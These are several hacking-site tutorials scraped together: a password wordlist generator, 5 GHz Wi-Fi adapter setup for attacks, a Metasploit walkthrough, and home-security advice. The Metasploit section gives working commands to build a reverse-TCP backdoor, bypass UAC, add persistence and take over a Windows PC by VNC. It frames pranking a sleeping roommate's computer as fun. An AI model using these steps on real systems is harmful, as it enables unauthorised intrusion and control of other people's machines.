iloveyouHunter2 iloveyouhunter2 SecretPassword iloveyousecret iloveyouPassword passwordIloveyou passwordSecret Hunter2Iloveyou Hunter2Secret Hunter2password Hunter2secret Hunter2iloveyou Hunter2Password hunter2Secret hunter2Iloveyou hunter2password hunter2iloveyou hunter2secret secretPassword PasswordIloveyou hunter2Password PasswordSecret Passwordiloveyou secretpassword secretIloveyou PasswordHunter2 Passwordhunter2 secretiloveyou Passwordsecret secretHunter2 secrethunter2Theupoption will transform every letter in a word into uppercase:~# python3 wordlister.py --input list.txt --perm 2 --min 6 --max 32 --up SECRET secret hunter2 HUNTER2 ILOVEYOU password PASSWORD iloveyou SECREThunter2 SECRETpassword SECRETHUNTER2 SECRETILOVEYOU SECRETPASSWORD SECRETiloveyou secrethunter2 secretpassword secretHUNTER2 secretILOVEYOU hunter2password hunter2iloveyou hunter2ILOVEYOU hunter2PASSWORD passwordSECRET passwordHUNTER2 passwordsecret passwordILOVEYOU passwordhunter2 passwordiloveyou HUNTER2SECRET HUNTER2secret HUNTER2ILOVEYOU HUNTER2PASSWORD HUNTER2password HUNTER2iloveyou ILOVEYOUsecret ILOVEYOUSECRET ILOVEYOUhunter2 ILOVEYOUpassword secretPASSWORD ILOVEYOUHUNTER2 secretiloveyou hunter2SECRET hunter2secret ILOVEYOUPASSWORD PASSWORDhunter2 PASSWORDSECRET PASSWORDHUNTER2 PASSWORDsecret PASSWORDILOVEYOU PASSWORDiloveyou iloveyouSECRET iloveyousecret iloveyouhunter2 iloveyoupassword iloveyouHUNTER2 iloveyouPASSWORDTheappendoption will append any given word to all passwords:~# python3 wordlister.py --input list.txt --perm 2 --min 6 --max 32 --append 1969 secret secret1969 password password1969 iloveyou iloveyou1969 hunter2 hunter21969 secretpassword secretpassword1969 secretiloveyou secretiloveyou1969 secrethunter2 secrethunter21969 passwordsecret passwordsecret1969 passwordiloveyou passwordiloveyou1969 passwordhunter2 passwordhunter21969 iloveyousecret iloveyousecret1969 iloveyoupassword iloveyoupassword1969 iloveyouhunter2 iloveyouhunter21969 hunter2secret hunter2secret1969 hunter2password hunter2password1969 hunter2iloveyou hunter2iloveyou1969Theprependoption will prepend any given word to all passwords:~# python3 wordlister.py --input list.txt --perm 2 --min 6 --max 32 --prepend Dave secret Davesecret iloveyou Daveiloveyou password Davepassword hunter2 Davehunter2 secretiloveyou Davesecretiloveyou secretpassword Davesecretpassword secrethunter2 Davesecrethunter2 iloveyoupassword iloveyouhunter2 Daveiloveyouhunter2 Daveiloveyoupassword passwordsecret Davepasswordsecret iloveyousecret Daveiloveyousecret passwordiloveyou Davepasswordiloveyou passwordhunter2 Davepasswordhunter2 hunter2secret Davehunter2secret hunter2iloveyou Davehunter2iloveyou hunter2password Davehunter2passwordAnd, of course, any of these options can be combined for a greater number of potential passwords:~# python3 wordlister.py --input list.txt --perm 2 --min 6 --max 32 --leet --cap --append 1969 secret secret1969 hunter2 53cr3t 53cr3t1969 hunter21969 hunt3r2 hunt3r21969 Password Password1969 P455w0rd P455w0rd1969 Iloveyou Iloveyou1969 iloveyou 1l0v3y0u iloveyou1969 1l0v3y0u1969 Secret Secret1969 1l0v3y0u 53cr3t 1l0v3y0u1969 53cr3t1969 password password1969 p455w0rd p455w0rd1969 Hunter2 Hunter21969 Hunt3r2 Hunt3r21969 secrethunter2 secrethunter21969 secretpassword secretpassword1969 53cr3thunt3r2 53cr3thunt3r21969 secretPassword 53cr3tp455w0rd secretPassword1969 53cr3tp455w0rd1969 53cr3tP455w0rd ...This list can grow quite long from only a few initial passwords, so it can be advantageous when creating acustom wordlistfor targeted password cracking.Rather than printing the results to the terminal screen, we can direct the output to a text file that can be used for cracking later:~# python3 wordlister.py --input list.txt --perm 2 --min 6 --max 32 --leet --cap --append 1969 > mywordlist.txtWordlister has a feature that will only output the specified number of iterations, too, in case we wanted to control the length of our list a little better. Use thetestoption to do so:~# python3 wordlister.py --input list.txt --perm 2 --min 6 --max 32 --test 10 password secret iloveyou hunter2 passwordsecret passwordiloveyou passwordhunter2 secretpassword secretiloveyou secrethunter2We can also manually specify the number of cores to use with thecoresoption. It can be useful when we don't want all of our resources being hogged at once:~# python3 wordlister.py --input list.txt --perm 2 --min 6 --max 32 --cores 1 hunter2 password secret iloveyou hunter2password hunter2secret hunter2iloveyou passwordhunter2 passwordsecret passwordiloveyou secrethunter2 secretpassword secretiloveyou iloveyouhunter2 iloveyoupassword iloveyousecretAs we can see, this simple tool can be incredibly powerful when it comes to creating targeted wordlists.Common Password MistakesOften, compromised passwords are all a hacker needs to gain access to a system. Strong passwords should be one of the most important aspects of maintaining a proper security posture, but a lot of mistakes are made when it comes to this simple principle.Passwords that are too short and passwords comprised only of letters are trivial to crack with any modern computer. Likewise, varying passwords by only one letter, or using numbers instead of letters (leetspeak), is something most cracking software takes into account already.Don't Miss:How to Create Stronger Passwords (Advice from a Hacker)Using a password that is too old and using the same password everywhere makes it much more likely to be compromised over time. Passwords that are created using personal details are also a no-go because any decent hacker will be able to find out specific information that makes these passwords just as easy to crack.Keeping your password a secret is also essential. That means nosharing it with anyone, and no writing it down on sticky notes next to your computer, however tempting it might be.Wrapping UpToday, we learned how to use a tool called Wordlister to create custom password combinations for cracking. First, we looked at a couple of other popular wordlist generators and how they compare to Wordlister. Next, we explored the tool and its options to create a list of custom password permutations. Finally, we covered some common mistakes that are made when coming up with passwords.Wordlister is a powerful tool that can be used to create custom, targeted wordlists β€” something that should be valuable to any hacker.Don't Miss:Diceware Gives You Truly Random Yet Easy-to-Memorize PasswordsWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover image bySteve Johnson/Pexels; Screenshots by drd_/Null ByteRelatedHack Like a Pro:How to Crack Passwords, Part 5 (Creating a Custom Wordlist with CeWL)Hack Like a Pro:How to Crack Passwords, Part 4 (Creating a Custom Wordlist with Crunch)Advice from a Real Hacker:How to Create Stronger PasswordsHack Like a Pro:How to Crack Passwords, Part 1 (Principles & Technologies)How To:Create Custom Wordlists for Password Cracking Using the MentalistNews:8 Tips for Creating Strong, Unbreakable PasswordsHow To:Recover Passwords for Windows PCs Using OphcrackHack Like a Pro:How to Crack Passwords, Part 3 (Using Hashcat)How To:Use Acccheck to Extract Windows Passwords Over NetworksHow To:Hack MD5 passwordsHack Like a Pro:How to Crack Passwords, Part 2 (Cracking Strategy)How To:Hack WPA/WPA2-Enterprise Part 2How To:Crack Password-Protected Microsoft Office Files, Including Word Docs & Excel SpreadsheetsHack Like a Pro:How to Crack Private & Public SNMP Passwords Using OnesixtyoneNews:'Beast' Cracks Billions of Passwords in SecondsHack Like a Pro:How to Crack User Passwords in a Linux SystemHow To:Creating Unique and Safe Passwords, Part 1 Using WordlistsHack Like a Pro:How to Grab & Crack Encrypted Windows PasswordsHow To:Crack Shadow Hashes After Getting Root on a Linux SystemHow To:Hack 200 Online User Accounts in Less Than 2 Hours (From Sites Like Twitter, Reddit & Microsoft)News:Advanced Cracking Techniques, Part 1: Custom DictionariesNews:Advanced Cracking Techniques, Part 2: Intelligent BruteforcingHow To:GPU Accelerate Cracking Passwords with HashcatRainbow Tables:How to Create & Use Them to Crack PasswordsHow To:How Hackers Take Your Encrypted Passwords & Crack ThemHow To:Recover WinRAR and Zip PasswordsMastering Security, Part 1:How to Manage and Create Strong PasswordsHow To:How Hackers Steal Your Internet & How to Defend Against ItHow To:Recover a Windows Password with OphcrackHow To:Hack Mac OS X Lion PasswordsGoodnight Byte:Coding a Web-Based Password Cracker in Python
How to Hack 5 GHz Wi-Fi Networks with an Alfa Wi-Fi Adapter Β« Null Byte :: WonderHowTo
Wi-Fi networks come in two flavors: the more common 2.4 GHz used by most routers and IoT devices, and the 5 GHz one offered as an alternative by newer routers. While it can be frustrating to attack a device that moves out of reach to a 5 GHz Wi-Fi network, we can use anAlfa dual-band adapterto hack Wi-Fi devices on either type of network.Wi-Fi is a radio standard that has been around since 1997, and the number of devices using it has made its part of the spectrum quite crowded. To relieve that stress, 5 GHz was introduced to offer fast Wi-Fi connections over similar distances as a comparable 2.4 GHz network. For hackers going after Wi-Fi devices, a router that provides both 2.4 and 5 GHz networks can be a real problem, as attacks requiring sending de-authentication frames can simply cause the target device to move out of reach to the 5 GHz network.Don't Miss:Research a Person or Organization Using the Operative Framework2.4 GHz vs 5 GHz Wi-FiIn the United States, 2.4 GHz Wi-Fi can operate on any channel between one and eleven. While it may seem like a lot of room, the truth is that all but three of these channels overlap with each other, causing issues with interference and slow speeds when too many devices are on the same channel. The reason it happens is that each channel is really just the center frequency of a 22 MHz wide channel. That means only channels one, six, and eleven are far enough apart not to overlap.Image viaWikimedia CommonsAs you can see in the picture above, devices on channels one and two would interfere with each other and share a lot of space on the radio spectrum. That makes it challenging to pack too many devices on to the same network, primarily because most IoT Wi-Fi devices operate on 2.4 GHz only.The 5 GHz offering gives faster speeds, more channels, and more room for devices to transmit than 2.4 GHz, but it suffers from some limitations in range. Over shorter distances, the broader channels of 5 GHz can allow for faster data transfers, but not all devices support the frequency. Modern routers will typically offer both types to provide the most spectrum for congested Wi-Fi networks, and modern smartphones and laptops will likely support 5 GHz networks. That makes it equally likely that a device belonging to a target might be connected to the 5 GHz or 2.4 GHz networks, making it critical to be able to interact with both.Don't Miss:Track Wi-Fi Devices & Connect to Them Using ProbequestHacking 5 GHz Wi-FiTo get started hacking 5 GHz networks, we'll need a network adapter with the proper chipset. TheAlfa Wireless AWUS036ACSis a dual-band network adapter that offers both 2.4 and 5 GHz reception in a single feed line, and it can be combined with a long-range directional antenna like theSimple Wi-Fi 2.4/5 GHz Yagiantenna. While the AWUS036ACS driver is not plug-and-play with Kali Linux, it's simple to install on both Kali and Ubuntu systems.A close-up of theAlfa AWUS036ACS.Image by Kody/Null ByteOnce we have the drivers installed, hackers will find that many standard Wi-Fi hacking tools work perfectly well against 5 GHz targets.Kismet,Wireshark, theAircrack suite, andWifite2are all updated to take advantage of the ability to target 5 GHz networks. That means hackers who can't access 5 GHz channels are missing out on half of the fun, which may become an issue with devices that can transition between both types of networks.TheAlfa AWUS036ACSwired up and ready.Image by Kody/Null ByteWhat You'll NeedTo get started with hacking 5 GHz networks, you'll need a wireless network adapter that supports 5 GHz and preferably 2.4 GHz. TheAlfa AWUS036ACS 802.11ac AC600 Wi-Fi Wireless Network Adapterdoes a great job.If you want to extend your range, you can also look into along-range directional antennalike theSimple Wi-Fi dual-band antenna, which can pick up both 2.4 and 5 GHz from over a mile away.Don't Miss:Track a Target Using Canary Token Tracking LinksImage by Kody/Null ByteStep 1: Install Drivers on KaliThanks to popular demand, Kali Linux has included the RealTek drivers needed to control many 5 GHz adapters. The installation process on Kali is by far the most simple, but it's critical to update and upgrade your system before doing so. Keep in mind that on a slow connection, it can take quite some time.~$ apt update && apt upgrade ~$ apt dist-upgradeOnce your system is entirely up to date, you can install the drivers you need on Kali with the following command.~$ apt install realtek-rtl88xxau-dkmsThat should install the driver, and you can try plugging in the network adapter after a reboot to see if the LED on it flashes immediately. Next, we'll test out the functionality of the adapter.Step 2: Set Monitor Mode in Kali LinuxIf you can see the adapter when runningifconfigorip aafter installing the driver, we can move on to trying toput it into monitor modeto verify it works. First, we'll need to bring the interface down to put it into monitor mode. Make sure to replace wlan0 with the name of your wireless card.More Info:Check if Your Wireless Network Adapter Supports Monitor Mode & Packet Injection~$ sudo ip link set wlan0 downNext, we'll set monitor mode usingiwconfigin the following command.~$ sudo iwconfig wlan0 mode monitorFinally, we'll bring the interface back up after it's been put in monitor mode.~$ sudo ip link set wlan0 upIf all of these steps worked smoothly, then your card should be in monitor mode, and you may be good to go. To try out working with 5 GHz channels, we can move on to the next step.Step 3: Test the Card on KaliTo test if we've got the card working on Kali, we'll try to set it to a 5 GHz channel. First, we can try to set the channel with the following command in a terminal window.~$ sudo iw wlan0 set channel 6 HT40-That will attempt to set the channel to a 5 GHz frequency. In general, you can use this command to specify a channel in the 5 GHz range to listen in on. To set the channel to 149 with the channel width set to 80 MHz, we can modify the command to look like the example below.~$ sudo iw wlan0 set freq 5745 80 5775If it isn't working, then you can move on to the manual installation, which also works on Ubuntu.Don't Miss:Hunting Down & Cracking WEP NetworksStep 4: Install Drivers on UbuntuTo install the drivers directly, we'll be using the Aircrack-ng GitHub repo and DKMS. First, we'll need to install DKMS and download the GitHub repo with the command below.~$ sudo apt-get install dkms ~$ git clone https://github.com/aircrack-ng/rtl8812au.gitOnce it is installed, we can change directories into the repository by typingcd rtl8812au. Then, we just need to run a single command to install the driver from within the folder we downloaded.~$ sudo ./dkms-install.shYou should see output like below if it's successful.About to run dkms install steps... Creating symlink /var/lib/dkms/rtl8812au/5.3.4/source -> /usr/src/rtl8812au-5.3.4 DKMS: add completed. Kernel preparation unnecessary for this kernel. Skipping... Building module: cleaning build area... 'make' -j2 KVER=4.15.0-55-generic KSRC=/lib/modules/4.15.0-55-generic/build.......................... Finished running dkms install steps.Finally, let's run airodump-ng to test if the card can capture on a 5 GHz channel. The following command uses the--bandoption to set Airodump to scan through 5 GHz channels.~$ airodump-ng wlan1 --band aIf we've got the card up and running, we should start to see 5 GHz networks appear!Don't Miss:Cracking WPA2 Passwords Using the New PMKID Hashcat AttackCH 200 ][ Elapsed: 12 s ][ 2019-08-19 04:56 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:69:54:32:12:99 -55 3 0 0 1 54e WPA2 CCMP PSK MySpectrumWiFi69-2G 88:24:62:94:10:2A -74 1 0 0 -1 54e WPA2 CCMP PSK MySpectrumWiFi96-5G5 GHz Networks Are in Easy ReachWhile network adapters like theAlfa Wireless AWUS036ACSmay not be plug-and-play with Kali Linux, they are well supported and easy to get set up in only a few commands. Once you've got the drivers installed, you can easily use familiar tools like Wireshark to capture data on 5 GHz networks the same as 2.4 GHz networks. Thanks to these cheap and easy-to-set-up network adapters, a directional antenna can let a hacker manipulate 5 GHz networks from extreme distances on a budget.Don't Miss:How to Pick an Antenna for Wi-Fi HackingI hope you enjoyed this guide to getting started with hacking 5 GHz Wi-Fi networks! If you have any questions about this tutorial on setting up anAlfa Wireless AWUS036ACS, please ask below, and if you have a comment or idea for a future episode, feel free to reach me on [email protected]'t Miss:Use MDK3 for Advanced Wi-Fi JammingWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover photo by Kody/Null ByteRelatedHow To:Buy the Best Wireless Network Adapter for Wi-Fi Hacking in 2019How to Hack Wi-Fi:Get Anyone's Wi-Fi Password Without Cracking Using WifiphisherHow To:Check if Your Wireless Network Adapter Supports Monitor Mode & Packet InjectionHow To:Hunt Down Wi-Fi Devices with a Directional AntennaHow To:Pick an Antenna for Wi-Fi HackingHow To:Share Wi-Fi Adapters Across a Network with Airserv-NgHow To:Spy on Network Relationships with Airgraph-NgHow to Hack Wi-Fi:Disabling Security Cameras on Any Wireless Network with Aireplay-NgHow to Hack Wi-Fi:Choosing a Wireless Adapter for HackingHow To:Hack Wi-Fi Networks with BettercapHow To:Select a Field-Tested Kali Linux Compatible Wireless AdapterHow To:Automate Wi-Fi Hacking with Wifite2Buyer's Guide:Top 20 Hacker Holiday Gifts for Christmas 2017Android Basics:How to Connect to a Wi-Fi NetworkHow to Hack Wi-Fi:Cracking WPA2 Passwords Using the New PMKID Hashcat AttackHacking Android:How to Create a Lab for Android Penetration TestingHow to Hack Wi-Fi:Getting Started with Terms & TechnologiesHow to Hack Wi-Fi:Getting Started with the Aircrack-Ng Suite of Wi-Fi Hacking ToolsNews:Apple Releases iOS 12.0.1 to Address Wi-Fi & Charging Issues on iPhonesHow To:Extend a (Hacked)Router's Range with a Wireless Adapter.How to Hack Wi-Fi:Selecting a Good Wi-Fi Hacking StrategyHow To:Scan, Fake & Attack Wi-Fi Networks with the ESP8266-Based WiFi DeautherHow To:iOS 6 Broke Your Wi-Fi? Here's How to Fix Connection Problems on Your iPhone or iPadHow To:Hack WPA & WPA2 Wi-Fi Passwords with a Pixie-Dust Attack Using AirgeddonHow To:Easily Store Your iPhone's Wi-Fi Passwords & Share Them with Anybody β€” Even Android UsersHacking Gear:10 Essential Gadgets Every Hacker Should TryHow To:Having Connection Issues on Android Pie? Turn Off 'Turn on Wi-Fi Automatically'How to Hack Wi-Fi:Hunting Down & Cracking WEP NetworksHow To:This Widget Lets You Open Wi-Fi Settings Faster, Share Passwords & More on Your iPhoneHow To:Save Battery Power by Pairing Wi-Fi Connections with Cell Tower Signals on Your Galaxy Note 3How To:Make Your Android Automatically Switch to the Strongest WiFi NetworkNews:Project Zero Finds iPhone & Android Open to Bugs in Broadcom's Wi-Fi ChipsHow to Hack Wi-Fi:Breaking a WPS PIN to Get the Password with BullyHow To:Turn on Google Pixel's Wi-Fi Assistant to Get Secure Access on Open NetworksHow to Hack Wi-Fi:Cracking WPA2-PSK Passwords Using Aircrack-NgHow To:Use Kismet to Watch Wi-Fi User Activity Through WallsHow To:Get the Strongest Wi-Fi Connection on Your Android Every TimeWiFi Prank:Use the iOS Exploit to Keep iPhone Users Off the InternetHow To:Track Wi-Fi Devices & Connect to Them Using ProbequestHow To:Load Kali Linux on the Raspberry Pi 4 for the Ultimate Miniature Hacking Station
How to Run an VNC Server on Win7 Β« Null Byte :: WonderHowTo
OTW's great Tutorial Hack Like a Pro: How to Save the World from Nuclear Annihilation gives me the inspiration to try this on Win7 sp1.I did this under Bugtraq 2 Black Widow but it works almost similar on Kali-Linux.Step 1: Start All Services Und Run MetasploitOn bugtraq not preinstalled so:# sudo apt-get install vncviewerThan start the required services:# sudo service postgresql start# sudo service metasploit start# sudo msfconsoleStep 2: We Need Two PayloadsI did this with msfpayload:First we need the meterpretermsf > msfpayload windows/meterpreter/reversetcp LHOST=<your-ip> LPORT=<listening-port> x > /home/bugtraq/Desktop/backdoor.exeNow we got the file backdoor.exe on our Desktop now we need another .exe file that we will upload to our target and execute with the meterpreter.msf > msfpayload windows/vncinject/reversetcp LHOST=<your-ip>LPORT=<lisening-port> x > /home/bugtraq/Desktop/gui.exeStep 3: Lets Run the Meterpreter and Bypass the UACmsf > use multi/handlermsf exploit(handler) > set payload windows/meterpreter/reversetcpmsf exploit(handler) > set LHOST <your-ip>msf exploit(handler) > set LPORT <port>msf exploit(handler) > exploitSo we see that the meterpreter is running on our target but we need more system rights.meterpreter > getprivsmeterpreter > getsystemAccess Denied!!Should not be a big problemYou can look you Privs with the commandmeterpreter > run post/windows/gather/winprivsmeterpreter > backgroundmsf exploit(handler) > use exploit/windows/local/bypassuacmsf exploit(bypassuac) > set payload windows/meterpreter/reversetcpmsf exploit(bypassuac) > set LHOST <your-ip>msf exploit(bypassuac) > set LPORT <port>msf exploit(bypassuac) > set session 1msf exploit(bypassuac) > exploitIf that happens only try againmsf exploit (bypassuac) > exploitworks, now:meterpreter > getsystemmeterpreter > getprivsNow we should owned the system but we want to have an VNC on the target.If you want to make the meterpreter persistence should something go wrong just typemeterpreter > run persistence –A –L c:\\ -X 5 –p <port> –r <your-ip>Step 4: Now the Funny Partthe meterpreter got the download and upload function and the works like thismeterpreter > upload -r /home/bugtraq/Desktop/gui.exe C:/Now we open a second metasploit terminal and type inmsf > use multi/handlermsf exploit(handler) > set payload windows/vncinject/reversetcpmsf exploit(handler) > set LHOST <your-ip>msf exploit(handler) > set LPORT <port>msf exploit(handler) > exploitIt should now look like thisStep 5: Getting Finished...Now we go back to our meterpreter terminal, make sure you are in the folder C:/ where the gui.exe file is and type inmeterpreter > execute -f gui.exeStep 6: MUCH More FUNLets say in front of our target pc sleeps a person(roomate/girlfriend/whatever), if you want to wake him/her in an anoying way search his musik and have some Fun hehe,meterpreter > uictl disable mousemeterpreter > uictl disable keyboardand have fun :DI am sure there are better ways to do this hackbut it works, suggestions for improvement are always welcome!Hope you enjoyedWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedHow To:Use VNC to Remotely Access Your Raspberry Pi from Other DevicesHow To:Setup VNC on your computer for your Mac Mini serverHow To:Run Windows 7 on a Nokia n900 SmartphoneHow To:Create an SSH tunnel for your Mac Mini serverHow To:Monitor another computer screen with Real VNCHack Like a Pro:How to Save the World from Nuclear AnnihilationHow To:Bypass RealVNC authenticationHow To:Control iPhone/iPod Touch from a computerNews:Top 10 Bukkit PluginsHow To:Download and install Windows 7 language packsHow To:Get Flash to run on your iPad using a VNC appHow To:Run Your Favorite Graphical X Applications Over SSHHack Like a Pro:How to Take Control of Windows Server 2003 Remotely by Launching a Reverse ShellHow To:Control your PC from anywhereHack Like a Pro:How to Use PowerSploit, Part 1 (Evading Antivirus Software)How To:Secure VNC and Apple Remote Desktop on your computerHow To:Remotely Control Computers Over VNC Securely with SSHNews:Server RunningNews:The server timeNews:SchoolHow To:Code a Basic TCP/IP Client & Server Duo in PythonHow To:Run a Free Web Server From Home on Windows or Linux with ApacheHow To:Download and Install Minecraft 1.2.5 (Works on 1.2.4 Servers!)Hacking Reconnaissance:Finding Vulnerabilities in Your Target Using NmapNews:The Minecraft World Server Now Has a Capture the Flag ArenaLock Down Your Web Server:10 Easy Steps to Stop Hackers from AttackingHow To:Run an FTP Server from Home with Linux
Advice from a Real Hacker: How to Protect Yourself from Being Hacked Β« Null Byte :: WonderHowTo
Each day, we read about another security breach somewhere in our digital world. It has become so commonplace that we hardly react anymore.Target,J.P. Morgan,iCloud,Home Depot, and the list goes on and on.Those are just the big ones that get reported in the news. Millions take place every year that are not reported. Despite that, the public is suffering from "security breach fatigue." No one seems to care anymore. As the public becomes "dulled" to the importance of these breaches, they are more likely to ignore some basic measures to protect their systems.As someone responsible for my share of "breaches," I would like to offer you some simple ways that you prevent yourself from becoming a victim of these types of hacks. Keep in mind that nothing will protect you 100% from all attacks. The only way to assure that is to take your machine offline, and no one wants to do that.There so many ways to attack an online computer that if someone is determined to hack you, and they have the knowledge and skills, they are likely to get in. What you can do, though, is make it as difficult as possible for the random fly-by hacker to get into your system and instead target their efforts to someone who is much easier to victimize.One of the first things you need to understand is that hackers are constantlyscanning the world for vulnerable systems. They simply write a little program or script to scan every IP address on the planet looking for a particular known vulnerability or two. When they find that your system has that vulnerability, then they begin the attack. If your system doesn't come up on their radar, they will simply pass you by and look at the next online computer.Here are few common sense measures to keep yourself from being hacked. I've tried to arrange them from the most basic to the more advanced. Obviously, the more of these measures your implement, the less the chance that you will be hacked.Note: I use the term "malware" here to indicate any type of bad (malicious) software. This includes viruses, trojans, worms, adware,rootkits, etc. Rather than trying to make distinctions between each of these types of software, I prefer the all-encompassing term malware.Step 1: Use Stronger PasswordsPassword are your first line of defense in this digital war between hackers and the potential victims. IfI can get your password, the rest is easy. Most people use simple-to-crack passwords that anyone of my ilk could decipher in minutes or hours at most. Rather than go into great lengths here about how to protect your password, I direct your attention to my recently posted article oncreating stronger passwords."I<3mtnb1K1ng&H1k1ng" may not be an impossible passphrase to crack, but it's definitely harder.Image viaShutterstockStep 2: Use Two-Factor AuthenticationNearly all computers and all systems (home security systems, car lock, garage door opener,iCloud, etc.) require a username and password to authenticate. To authenticate means to prove who you are. More secure systems are now using two-factor authentication, the first factor beingyour password.Authentication factors are generally broken down into three categories;What you know (passwords)What you haveWhat you are (biometrics)By requiring a second authentication factor, you can make it MUCH harder for me to hack your system.Cracking passwords, no matter how complex, can ALWAYS be cracked given enough time and resources. By requiring a second factor such as your fingerprint, though, it makes it much more difficult for hackers. Impersonating your fingerprint is not impossible, but far more difficult than cracking your password.Other potential two-factor authentication systems that many companies and military organizations are using is some type of token (something I have). This is usually some smart card that identifies the user. Although neither method is perfect, the combination makes you much safer from hackers like me.Step 3: Never, Ever Click on a Suspicious LinkI hope this is superfluous information, but NEVER clickon a link sent to youin an email. I don't care if it came from what appears to be trusted source, such as your bank or friend, NEVER click on a link in your email. It is so easy for me toembed malware in that innocuous looking linkthat it is child's play.In addition, if I hackyour friends email accountbecause they had a weak password, I can then send you emails from his/her account with malicious links that will give me control of your computer.Once I have control of your computer, I can steal whatever info is on your computer including your passwords to other accounts (bank, brokerage, other email accounts), social security number, and your identity. Then, I can sell each of those on the black market.Step 4: Do Not Use P2P File Sharing NetworksHopefully, this only applies to a few of you. Do NOT do use peer-to-peer file sharing sites. For the uninitiated, peer-to-peer (or P2P) file sharing is the uploading and downloading of music, videos, TV shows, movies, documents, and more from one computer to another without using a centralized server.This is the preferred method of sharing pirated content. Billions of files are shared this way every year. In fact, the HBO show Game of Thrones was shared this way illegally almost 6 million times alone last year. This makes HBO very unhappy, despitetheir lax password-sharing rules.Music, movies,documents, and other files are really easy to embed malware in. This means that when you download files from P2P networks, you are giving me easy access to your system. In reality, nearly all of these files have malware in them. I can guarantee you that if you have downloaded at least one file from P2P, that your machine is infected with malware, probably irretrievably.Step 5: Keep Your System & Apps UpdatedNew security vulnerabilities (holes) are being discovered daily in your operating system (Windows 7 or 8, Linux, Mac OS X) and your applications (Word, Excel, Flash,IE8,Adobe Reader, etc.). When these vulnerabilities are found, hackers like me then develop a way to exploit that vulnerability.Soon these "exploits" are passed around to other hackers and everyone is trying to use them against you. This then allows us to install our software on your system to control it and steal your resources and informationWhen the software developers such as Adobe,Microsoft, and Apple learn of these vulnerabilities, they then develop "patches" to close these security holes. They release these patches in the updates they offer you, sometimes daily. You must update to be secure!Image viaNull ByteWe hackers love when people refuse to update because that means that even old tried-and-true exploits will work with their systems. If you update, I have to be more creative in developing my own new hack.Updating all of the software on your system is critical, not just your operating system. Hackers love the Adobe products that we find on nearly every system. These includesFlash PlayerandAdobe Reader. They are such fertile grounds for us hackers as they are so BAD from a security perspective. We find a new security hole almost daily in these poorly-designed products.Step 6: Use Antivirus Products & Keep Them Up to DateOnce again, I hope this piece of advice is superfluous. Everyone should have some form of antivirus software on their system.AV software is not perfect, but it is certainly better than nothing.Even the best AV software is effective on about 95% of KNOWN malware (AV software is totally ineffective against unknown orzero-daymalware). That means that one in 20 pieces of malware will be missed. Some of the lower quality AV software will miss 1 in 2 pieces of malware. In addition, AV software is only effective if its activated and updated, so make certain to update itssignaturesdaily.AV software can't protect you from foolishness. If you click on that link sent to you by a friend or download a file from a P2P site, you are essentially inviting my hacker friends in to take over your system. In many cases, a well-designed malware can embed itself into the Windows system files and your AV software can neither detect it or remove it. In some cases,it can even disable your AV softwarebefore it's found out.Step 7: Do Not Use Adobe FlashAdobe's Flash Player is on nearly every computer andeven Android devicesthat install it manually. It enables us to run those interestingRussian dashcamvideos as well YouTube, animations, etc. Without it, when you go a website with video or animations, you get that ominous looking message that you need to install Flash Player and a blank screen.A few years back, Apple and Steve Jobs made a controversial decision to ban Flash player from their iOS. It has been reported that Jobs made this decision out of vindictiveness toward some personalities at Adobe. Instead, I suggest, that Jobs made this decision because Flash Player is such a poorly designed and coded piece of software that he wanted to protect his mobile operating system from it.Flash Player is amongmy favorite pieces of code to hack. Nearly everyone has it and it is SO flawed. I know this is radical step, but if you really want to make certain that your system is "bullet" proof, remove Flash Player from your computer, tablet, and smartphone. Even with updates, new vulnerabilities come out daily for this "hackers best friend."Step 8: Use a Really Good FirewallAlthough Microsoft ships a rudimentary firewall with its operating system, I strongly suggest that you install a third-party firewall for better protection.There are many third-party software firewalls out there, some better than others, but I want to suggestZone Alarm's Free Firewall. As the name says, it is free and very effective. Not only does it block outsiders from getting in, but it also stops malware from accessing resources on your computer and talking out (hackers need to control the malware, so the malware must be able to communicate OUT to be effective).I'm hoping that those who are reading this will take this basic measures to protect your system and data and make it far more difficult for us hackers to exploit your system. Don't worry about us, we know that most people won't take these measures, leaving plenty of easy pickings for us.For more insider tips on protecting yourself, stay tuned to thisAdvice from a Real Hackerseries here onNull Byte.Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover image viaShutterstockRelatedA Hackers Advice & Tip:Choosing Your Path. Knowing Where to Learn & How to Learn It **Newbies Please Read**News:8 Tips for Creating Strong, Unbreakable PasswordsHow To:Keeping Your Hacking Identity SecretBecome an Elite Hacker, Part 1:Getting StartedTypoGuy Explaining Anonymity:A Hackers MindsetAdvice from a Real Hacker:How to Create Stronger PasswordsHow To:How Hackers Take Your Encrypted Passwords & Crack ThemNews:Social Hacking and Protecting Yourself from Prying EyesCommunity Byte:HackThisSite, Realistic 3 - Real Hacking SimulationsCommunity Byte:HackThisSite, Realistic 5 - Real Hacking SimulationsCommunity Byte:HackThisSite, Realistic 4 - Real Hacking SimulationsGoodnight Byte:HackThisSite, Realistic 3 - Real Hacking 